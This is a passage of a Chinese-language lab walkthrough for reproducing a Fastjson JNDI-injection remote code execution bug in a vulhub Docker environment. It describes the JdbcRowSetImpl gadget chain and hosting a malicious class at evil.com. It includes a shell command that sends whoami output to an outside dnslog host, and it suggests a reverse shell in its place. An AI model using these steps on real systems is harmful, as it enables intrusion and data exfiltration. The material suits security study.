2.编译并启动环境
docker-compose up -d
3.查看环境运行状态
docker ps | grep rce
访问 8090 端口
[](
)漏洞利用
首先 vulhub 给出的复现提示如下
因为目标环境是Java 8u102,没有com.sun.jndi.rmi.object.trustURLCodebase的限制,
我们可以使用com.sun.rowset.JdbcRowSetImpl的利用链,借助JNDI注入来执行命令。
首先编译并上传命令执行代码,如http://evil.com/TouchFile.class:
[](
)编译 TouchFile.class 文件
这里就利用到了我们本地的 JAVA
环境,我们需要将下面的代码编译成一个 class
文件。
将下面的代码复制到一个文件,然后使用 javac
命令进行编译.
其中的 "touch", "/tmp/success"
,可以替换成自己的反弹shell或者其他命令执行语句,比如
String[] commands = {"/bin/sh","-c",“ping user.whoami
.38v2ib.dnslog.cn”};